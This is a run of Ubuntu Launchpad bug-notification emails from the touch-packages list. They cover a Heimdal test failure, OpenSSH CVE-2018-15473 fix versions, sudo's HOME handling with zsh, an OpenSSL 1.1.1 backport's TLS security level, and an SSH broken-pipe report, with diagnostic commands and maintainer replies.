https://bugs.launchpad.net/bugs/1823422

Title:
  heimdal ftbfs in disco

Status in Heimdal:
  New
Status in heimdal package in Ubuntu:
  New

Bug description:
  https://launchpadlibrarian.net/417925401/buildlog_ubuntu-disco-
  amd64.heimdal_7.5.0+dfsg-2.1_BUILDING.txt.gz

  =
 Heimdal 7.5.0: lib/hx509/test-suite.log
  =

  # TOTAL: 16
  # PASS:  15
  # SKIP:  0
  # XFAIL: 0
  # FAIL:  1
  # XPASS: 0
  # ERROR: 0

  .. contents:: :depth: 2

  FAIL: test_chain
  

  cert -> root
  cert -> root
  cert -> root
  sub-cert -> root
  sub-cert -> sub-ca -> root
  sub-cert -> sub-ca
  sub-cert -> sub-ca -> root
  sub-cert -> sub-ca -> root
  sub-cert -> sub-ca -> root
  max depth 2 (ok)
  max depth 1 (fail)
  ocsp non-ca responder
  ocsp ca responder
  ocsp no-ca responder, missing cert
  ocsp no-ca responder, missing cert, in pool
  ocsp no-ca responder, keyHash
  ocsp revoked cert
  ocsp print reply resp1-ocsp-no-cert
  ocsp print reply resp1-ca
  ocsp print reply resp1-keyhash
  ocsp print reply resp2
  ocsp verify exists
  ocsp verify not exists
  ocsp verify revoked
  crl non-revoked cert
  FAIL test_chain (exit status: 1)

  
  Testsuite summary for Heimdal 7.5.0
  
  # TOTAL: 16
  # PASS:  15
  # SKIP:  0
  # XFAIL: 0
  # FAIL:  1
  # XPASS: 0
  # ERROR: 0
  
  See lib/hx509/test-suite.log
  Please report to https://github.com/heimdal/heimdal/issues

To manage notifications about this bug go to:
https://bugs.launchpad.net/heimdal/+bug/1823422/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

[Seth Arnold]

Root, aha! We've finally uncovered the root of the problem. (Sorry. I
can't help myself. It's Friday afternoon.)

While Qualys' TLS scanner is a top-notch tool that I use regularly,
their "security scanner" is sadly not. They have built a tool that
checks version numbers. This is not ideal, because the clear majority of
Linux systems do not do wholesale version updates but instead backport
specific security fixes:

https://wiki.ubuntu.com/SecurityTeam/FAQ#Versions
https://www.debian.org/security/faq#version
https://wiki.centos.org/FAQ/General#head-3dad8cb98ac535185e58e882a23ca4b096cbff2f
https://access.redhat.com/security/updates/backporting

These sorts of security scanners would be more useful if everyone built
their entire systems from scratch.

Anyway, please ask Qualys to consider consuming our OVAL data:
https://people.canonical.com/~ubuntu-security/oval/
or parsing our database directly:
https://git.launchpad.net/ubuntu-cve-tracker

Both of these approaches would give better results. (There are tradeoffs
involved. They are welcome to contact us at secur...@ubuntu.com if they
would like to discuss the tradeoffs.)

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629

Title:
  CVE-2018-15473 - User enumeration vulnerability

Status in openssh package in Ubuntu:
  Fix Released
Status in openssh source package in Trusty:
  Fix Released
Status in openssh source package in Xenial:
  Fix Released
Status in openssh source package in Bionic:
  Fix Released
Status in openssh source package in Cosmic:
  Fix Released

Bug description:
  https://nvd.nist.gov/vuln/detail/CVE-2018-15473

  OpenSSH through 7.7 is prone to a user enumeration vulnerability due
  to not delaying bailout for an invalid authenticating user until after
  the packet containing the request has been fully parsed, related to
  auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

  Fixed in Debian: https://www.debian.org/security/2018/dsa-4280

  Currently pending triage? https://people.canonical.com/~ubuntu-
  security/cve/2018/CVE-2018-15473.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1794629/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1823202] Re: HOME points to something not owned by user in sudo

[Seth Arnold]

You should use sudo -i to get a clean root login without your local user
configuration seeping into the shell.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1823202

Title:
  HOME points to something not owned by user in sudo

Status in sudo package in Ubuntu:
  New
Status in zsh package in Ubuntu:
  New

Bug description:
   You shouldn't use interactive shell, or any program with
  executable configuration, while your HOME points to something not
  owned by your user. That's the big issue and it's with sudo, not zsh,
  not omz, not any other shell or application you launch.  You
  can go shout "you are doing security wrong" at Ubuntu. Good luck.

  ╭─rkm@Khadas ~  
  ╰─➤  id rkm && getent passwd rkm
  uid=1001(rkm) gid=1001(rkm) 
groups=1001(rkm),0(root),4(adm),5(tty),6(disk),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),50(staff),60(games),100(users),101(systemd-journal),104(input),108(netdev),112(bluetooth),113(lpadmin),121(pulse-access)
  rkm:x:1001:1001:Ryan McKee:/home/rkm:/usr/bin/zsh

  ╭─rkm@Khadas ~  
  ╰─➤  sudo /usr/bin/env  1 
↵
  LC_MESSAGES=en_US.UTF-8
  LANG=en_US.UTF-8
  LANGUAGE=en_US.UTF-8
  TERM=xterm-256color
  XAUTHORITY=/home/rkm/.Xauthority
  COLORTERM=truecolor
  DISPLAY=:0.0
  PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
  HOME=/home/rkm
  LC_CTYPE=en_US.UTF-8
  
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
  MAIL=/var/mail/root
  LOGNAME=root
  USER=root
  USERNAME=root
  SHELL=/bin/bash
  SUDO_COMMAND=/usr/bin/env

  
  SUDO_USER=rkm
  SUDO_UID=1001
  SUDO_GID=1001
  ╭─rkm@Khadas ~  
  ╰─➤  

   CyberManifest: sudo is a package. Also, once filed, add
  zsh to the bug since it could be a bug in zsh's package as well.

   Not necessarily zsh itself, but the packaging.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: sudo 1.8.21p2-3ubuntu1
  Uname: Linux 4.9.40 aarch64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: arm64
  CurrentDesktop: XFCE
  Date: Thu Apr  4 11:07:42 2019
  SourcePackage: sudo
  UpgradeStatus: No upgrade log present (probably fresh install)
  VisudoCheck:
   /etc/sudoers: parsed OK
   /etc/sudoers.d/README: parsed OK

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/1823202/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1823202] Re: HOME points to something not owned by user in sudo

[Seth Arnold]

This appears to be the missing context:

╭─rkm@Khadas ~  
╰─➤  sudo -s
[oh-my-zsh] Insecure completion-dependent directories detected:
drwxr-xr-x  11 rkm rkm  4096 Mar 30 19:19 /home/rkm/.oh-my-zsh
drwxr-xr-x 266 rkm rkm 12288 Mar 30 19:19 /home/rkm/.oh-my-zsh/plugins
drwxr-xr-x   2 rkm rkm  4096 Mar 30 19:19 /home/rkm/.oh-my-zsh/plugins/git

[oh-my-zsh] For safety, we will not load completions from these directories 
until
[oh-my-zsh] you fix their permissions and ownership and restart zsh.
[oh-my-zsh] See the above list for directories with group or other writability.

[oh-my-zsh] To fix your permissions you can do so by disabling
[oh-my-zsh] the write permission of "group" and "others" and making sure that 
the
[oh-my-zsh] owner of these directories is either root or your current user.
[oh-my-zsh] The following command may help:
[oh-my-zsh] compaudit | xargs chmod g-w,o-w

[oh-my-zsh] If the above didn't help or you want to skip the verification of
[oh-my-zsh] insecure directories you can set the variable ZSH_DISABLE_COMPFIX to
[oh-my-zsh] "true" before oh-my-zsh is sourced in your zshrc file.

from http://dpaste.com/1NQ618Y

** Information type changed from Private Security to Public

** Also affects: zsh (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1823202

Title:
  HOME points to something not owned by user in sudo

Status in sudo package in Ubuntu:
  New
Status in zsh package in Ubuntu:
  New

Bug description:
   You shouldn't use interactive shell, or any program with
  executable configuration, while your HOME points to something not
  owned by your user. That's the big issue and it's with sudo, not zsh,
  not omz, not any other shell or application you launch.  You
  can go shout "you are doing security wrong" at Ubuntu. Good luck.

  ╭─rkm@Khadas ~  
  ╰─➤  id rkm && getent passwd rkm
  uid=1001(rkm) gid=1001(rkm) 
groups=1001(rkm),0(root),4(adm),5(tty),6(disk),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),50(staff),60(games),100(users),101(systemd-journal),104(input),108(netdev),112(bluetooth),113(lpadmin),121(pulse-access)
  rkm:x:1001:1001:Ryan McKee:/home/rkm:/usr/bin/zsh

  ╭─rkm@Khadas ~  
  ╰─➤  sudo /usr/bin/env  1 
↵
  LC_MESSAGES=en_US.UTF-8
  LANG=en_US.UTF-8
  LANGUAGE=en_US.UTF-8
  TERM=xterm-256color
  XAUTHORITY=/home/rkm/.Xauthority
  COLORTERM=truecolor
  DISPLAY=:0.0
  PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
  HOME=/home/rkm
  LC_CTYPE=en_US.UTF-8
  
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
  MAIL=/var/mail/root
  LOGNAME=root
  USER=root
  USERNAME=root
  SHELL=/bin/bash
  SUDO_COMMAND=/usr/bin/env

  
  SUDO_USER=rkm
  SUDO_UID=1001
  SUDO_GID=1001
  ╭─rkm@Khadas ~  
  ╰─➤  

   CyberManifest: sudo is a package. Also, once filed, add
  zsh to the bug since it could be a bug in zsh's package as well.

   Not necessarily zsh itself, but the packaging.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: sudo 1.8.21p2-3ubuntu1
  Uname: Linux 4.9.40 aarch64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: arm64
  CurrentDesktop: XFCE
  Date: Thu Apr  4 11:07:42 2019
  SourcePackage: sudo
  UpgradeStatus: No upgrade log present (probably fresh install)
  VisudoCheck:
   /etc/sudoers: parsed OK
   

[Touch-packages] [Bug 1797386] Re: [SRU] OpenSSL 1.1.1 to 18.04 LTS

[Seth Arnold]

Steve Langasek has pointed out that I missed the point of the bug.

I'm not comfortable with OPENSSL_TLS_SECURITY_LEVEL=0 in bionic. (Or,
indeed, in cosmic either.)

We shipped 18.04 LTS with OPENSSL_TLS_SECURITY_LEVEL=1, correct? I don't
recall seeing more than a handful of complaints about security parameter
mismatches over the last year. If anything, users are asking for tighter
defaults, not looser defaults.

I don't believe we should be downgrading the default security level as a
side effect of this transition.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1797386

Title:
  [SRU] OpenSSL 1.1.1 to 18.04 LTS

Status in openssl package in Ubuntu:
  In Progress
Status in libio-socket-ssl-perl source package in Bionic:
  New
Status in libnet-ssleay-perl source package in Bionic:
  New
Status in nova source package in Bionic:
  New
Status in openssl source package in Bionic:
  Confirmed
Status in python-cryptography source package in Bionic:
  New
Status in python2.7 source package in Bionic:
  New
Status in python3.6 source package in Bionic:
  New
Status in python3.7 source package in Bionic:
  New
Status in r-cran-openssl source package in Bionic:
  Fix Committed
Status in ruby-openssl source package in Bionic:
  Fix Committed
Status in ruby2.5 source package in Bionic:
  New

Bug description:
  [Impact]

   * OpenSSL 1.1.1 is an LTS release upstream, which will continue to
  receive security support for much longer than 1.1.0 series will.

   * OpenSSL 1.1.1 comes with support for TLS v1.3 which is expected to
  be rapidly adopted due to increased set of supported hashes & algoes,
  as well as improved handshake [re-]negotiation.

   * OpenSSL 1.1.1 comes with improved hw-acceleration capabilities.

   * OpenSSL 1.1.1 is ABI/API compatible with 1.1.0, however some
  software is sensitive to the negotiation handshake and may either need
  patches/improvements or clamp-down to maximum v1.2.

  [Test Case]

   * Rebuild all reverse dependencies

   * Execute autopkg tests for all of them

   * Clamp down to TLS v1.2 software that does not support TLS v1.3
  (e.g. mongodb)

   * Backport TLS v1.3 support patches, where applicable

  [Regression Potential]

   * Connectivity interop is the biggest issues which will be
  unavoidable with introducing TLS v1.3. However, tests on cosmic
  demonstrate that curl/nginx/google-chrome/mozilla-firefox connect and
  negotiate TLS v1.3 without issues.

   * Mitigation of discovered connectivity issues will be possible by
  clamping down to TLS v1.2 in either server-side or client-side
  software or by backporting relevant support fixes

   * Notable changes are listed here
  https://wiki.openssl.org/index.php/TLS1.3

   * Most common connectivity issues so far:
     - client verifies SNI in TLSv1.3 mode, yet client doesn't set hostname. 
Solution is client change to set hostname, or to clamp down the client to 
TLSv1.2.

     - session negotiation is different in TLSv1.3, existing client code
  may fail to create/negotiate/resume session. Clients need to learn how
  to use session callback.

   * This update bundles python 3.6 and 3.7 point releases

   * Following the change in Cosmic and up, this SRU also includes a
  distro patch that lowers OPENSSL_TLS_SECURITY_LEVEL from 1 to 0, to
  allow for establishing client->server server->client connections with
  lower grade security settings (e.g. sub-80bits keys, MD5/SHA1
  certificate checksums, and other crap like that). This is to continue
  allow bionic clients to connect to servers operating with older 1.0.x
  based openssl, as typically clients are at no mercy to reject servers
  that do not have any better certs/keys/signatures. Thus potentially
  weak-security connections that previously would fail to establish
  to/from bionic, may now be accepted. Some may view this as a
  regression. In that case adjust openssl.cnf to a higher
  TLS_SECURITY_LEVEL, or use the openssl ctx APIs to set a higher TLS
  security level. See further comments in this bug report as to when we
  will be raising this LEVEL up (currently timeline is to raise to 2, in
  20.04 LTS).

  [Other Info]

   * Previous FFe for OpenSSL in 18.10 is at
     https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1793092

   * TLS v1.3 support in NSS is expected to make it to 18.04 via
  security updates

   * TLS v1.3 support in GnuTLS is expected to be available in 19.04

   * Test OpenSSL is being prepared in
     https://launchpad.net/~ci-train-ppa-service/+archive/ubuntu/3473

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1797386/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1797386] Re: [SRU] OpenSSL 1.1.1 to 18.04 LTS

[Seth Arnold]

I'm slightly concerned about raising the TLS minimums in our next LTS
release without some exposure to it in the 19.10 release. But this plan
sounds better than waiting until 20.10 to raise the minimums -- and
19.10 may be too soon to take the step.

But we don't have to decide on 19.10 defaults just yet.

Thanks for the explanation on why the change wouldn't make sense to
backport to previous releases. Modifying enough applications to allow
downgrades where necessary would carry significant risk of regressions
for users.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1797386

Title:
  [SRU] OpenSSL 1.1.1 to 18.04 LTS

Status in openssl package in Ubuntu:
  In Progress
Status in libio-socket-ssl-perl source package in Bionic:
  New
Status in libnet-ssleay-perl source package in Bionic:
  New
Status in nova source package in Bionic:
  New
Status in openssl source package in Bionic:
  Confirmed
Status in python-cryptography source package in Bionic:
  New
Status in python2.7 source package in Bionic:
  New
Status in python3.6 source package in Bionic:
  New
Status in python3.7 source package in Bionic:
  New
Status in r-cran-openssl source package in Bionic:
  Fix Committed
Status in ruby-openssl source package in Bionic:
  Fix Committed
Status in ruby2.5 source package in Bionic:
  New

Bug description:
  [Impact]

   * OpenSSL 1.1.1 is an LTS release upstream, which will continue to
  receive security support for much longer than 1.1.0 series will.

   * OpenSSL 1.1.1 comes with support for TLS v1.3 which is expected to
  be rapidly adopted due to increased set of supported hashes & algoes,
  as well as improved handshake [re-]negotiation.

   * OpenSSL 1.1.1 comes with improved hw-acceleration capabilities.

   * OpenSSL 1.1.1 is ABI/API compatible with 1.1.0, however some
  software is sensitive to the negotiation handshake and may either need
  patches/improvements or clamp-down to maximum v1.2.

  [Test Case]

   * Rebuild all reverse dependencies

   * Execute autopkg tests for all of them

   * Clamp down to TLS v1.2 software that does not support TLS v1.3
  (e.g. mongodb)

   * Backport TLS v1.3 support patches, where applicable

  [Regression Potential]

   * Connectivity interop is the biggest issues which will be
  unavoidable with introducing TLS v1.3. However, tests on cosmic
  demonstrate that curl/nginx/google-chrome/mozilla-firefox connect and
  negotiate TLS v1.3 without issues.

   * Mitigation of discovered connectivity issues will be possible by
  clamping down to TLS v1.2 in either server-side or client-side
  software or by backporting relevant support fixes

   * Notable changes are listed here
  https://wiki.openssl.org/index.php/TLS1.3

   * Most common connectivity issues so far:
     - client verifies SNI in TLSv1.3 mode, yet client doesn't set hostname. 
Solution is client change to set hostname, or to clamp down the client to 
TLSv1.2.

     - session negotiation is different in TLSv1.3, existing client code
  may fail to create/negotiate/resume session. Clients need to learn how
  to use session callback.

   * This update bundles python 3.6 and 3.7 point releases

   * Following the change in Cosmic and up, this SRU also includes a
  distro patch that lowers OPENSSL_TLS_SECURITY_LEVEL from 1 to 0, to
  allow for establishing client->server server->client connections with
  lower grade security settings (e.g. sub-80bits keys, MD5/SHA1
  certificate checksums, and other crap like that). This is to continue
  allow bionic clients to connect to servers operating with older 1.0.x
  based openssl, as typically clients are at no mercy to reject servers
  that do not have any better certs/keys/signatures. Thus potentially
  weak-security connections that previously would fail to establish
  to/from bionic, may now be accepted. Some may view this as a
  regression. In that case adjust openssl.cnf to a higher
  TLS_SECURITY_LEVEL, or use the openssl ctx APIs to set a higher TLS
  security level. See further comments in this bug report as to when we
  will be raising this LEVEL up (currently timeline is to raise to 2, in
  20.04 LTS).

  [Other Info]

   * Previous FFe for OpenSSL in 18.10 is at
     https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1793092

   * TLS v1.3 support in NSS is expected to make it to 18.04 via
  security updates

   * TLS v1.3 support in GnuTLS is expected to be available in 19.04

   * Test OpenSSL is being prepared in
     https://launchpad.net/~ci-train-ppa-service/+archive/ubuntu/3473

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1797386/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

[Seth Arnold]

Root, version 1:7.6p1-4ubuntu0.1 included the fix for CVE-2018-15473.

Version 1:7.6p1-4ubuntu0.2 is included in the disc image ubuntu-18.04.2
-server-amd64:

$ sha256sum ubuntu-18.04.2-server-amd64.iso 
a2cb36dc010d98ad9253ea5ad5a07fd6b409e3412c48f1860536970b073c98f5  
ubuntu-18.04.2-server-amd64.iso
$ bsdtar tf ubuntu-18.04.2-server-amd64.iso | grep openssh
pool/main/o/openssh
pool/main/o/openssh/openssh-client-udeb_7.6p1-4ubuntu0.2_amd64.udeb
pool/main/o/openssh/openssh-client_7.6p1-4ubuntu0.2_amd64.deb
pool/main/o/openssh/openssh-server-udeb_7.6p1-4ubuntu0.2_amd64.udeb
pool/main/o/openssh/openssh-server_7.6p1-4ubuntu0.2_amd64.deb
pool/main/o/openssh/openssh-sftp-server_7.6p1-4ubuntu0.2_amd64.deb
pool/main/o/openssh/ssh_7.6p1-4ubuntu0.2_all.deb

1:7.6p1-4ubuntu0.2 includes the fix from 1:7.6p1-4ubuntu0.1 and fixes three 
more CVEs:
- CVE-2018-20685
- CVE-2019-6109
- CVE-2019-6111

During the install, you have the option of downloading and installing updates. 
These additional updates include openssh version 1:7.6p1-4ubuntu0.3 which 
includes addition fixes for one CVE:
- CVE-2019-6111

Thanks

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-20685

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-6109

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-6111

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629

Title:
  CVE-2018-15473 - User enumeration vulnerability

Status in openssh package in Ubuntu:
  Fix Released
Status in openssh source package in Trusty:
  Fix Released
Status in openssh source package in Xenial:
  Fix Released
Status in openssh source package in Bionic:
  Fix Released
Status in openssh source package in Cosmic:
  Fix Released

Bug description:
  https://nvd.nist.gov/vuln/detail/CVE-2018-15473

  OpenSSH through 7.7 is prone to a user enumeration vulnerability due
  to not delaying bailout for an invalid authenticating user until after
  the packet containing the request has been fully parsed, related to
  auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

  Fixed in Debian: https://www.debian.org/security/2018/dsa-4280

  Currently pending triage? https://people.canonical.com/~ubuntu-
  security/cve/2018/CVE-2018-15473.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1794629/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1822370] Re: 19.04 beta openssh-client broken pipe

[Seth Arnold]

Hello,

Are there any messages in dmesg that look related? Can you ping those
hosts? Do you get ssh banners if you run:

echo "" | nc x.x.x.x 22

?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1822370

Title:
  19.04 beta openssh-client broken pipe

Status in openssh package in Ubuntu:
  New

Bug description:
  Upgrade to Xubuntu 19.04 beta from 18.10

  openssh-client

  when trying to ssh into another system, following error:

  packet_write_wait: Connection to x.x.x.x port 22: Broken pipe

  Problem is consistent on trying to connect to various systems.

  Can confirm was able to ssh prior to upgrade and can ssh into these
  systems from other systems.

  Can use putty on this system to ssh into these boxes as well.

  ProblemType: Bug
  DistroRelease: Ubuntu 19.04
  Package: openssh-client 1:7.9p1-9
  ProcVersionSignature: Ubuntu 5.0.0-8.9-generic 5.0.1
  Uname: Linux 5.0.0-8-generic x86_64
  ApportVersion: 2.20.10-0ubuntu23
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Fri Mar 29 13:36:38 2019
  InstallationDate: Installed on 2018-11-14 (135 days ago)
  InstallationMedia: Xubuntu 18.10 "Cosmic Cuttlefish" - Release amd64 
(20181017.2)
  ProcEnviron:
   LANGUAGE=en_US
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  RelatedPackageVersions:
   ssh-askpass   N/A
   libpam-sshN/A
   keychain  N/A
   ssh-askpass-gnome N/A
  SSHClientVersion: OpenSSH_7.9p1 Ubuntu-9, OpenSSL 1.1.1b  26 Feb 2019
  SourcePackage: openssh
  UpgradeStatus: Upgraded to disco on 2019-03-29 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1822370/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

[Seth Arnold]

root, version 1:7.6p1-4ubuntu0.1 was published to the archive on
November 6th 2018:

https://launchpad.net/ubuntu/+source/openssh/1:7.6p1-4ubuntu0.1
https://lists.ubuntu.com/archives/bionic-changes/2018-November/017000.html
https://usn.ubuntu.com/3809-1/

A default configuration of Ubuntu 18.04 LTS with unattended-upgrades
installed would have received this update within the next 36 hours or
so. If you installed before November 6th, then you probably received the
update November 6th or 7th. If you installed after November 6th, then
you probably received the update during installation. You can check
/var/log/dpkg.log* files to find the exact date and time you received
the update.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629

Title:
  CVE-2018-15473 - User enumeration vulnerability

Status in openssh package in Ubuntu:
  Fix Released
Status in openssh source package in Trusty:
  Fix Released
Status in openssh source package in Xenial:
  Fix Released
Status in openssh source package in Bionic:
  Fix Released
Status in openssh source package in Cosmic:
  Fix Released

Bug description:
  https://nvd.nist.gov/vuln/detail/CVE-2018-15473

  OpenSSH through 7.7 is prone to a user enumeration vulnerability due
  to not delaying bailout for an invalid authenticating user until after
  the packet containing the request has been fully parsed, related to
  auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

  Fixed in Debian: https://www.debian.org/security/2018/dsa-4280

  Currently pending triage? https://people.canonical.com/~ubuntu-
  security/cve/2018/CVE-2018-15473.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1794629/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
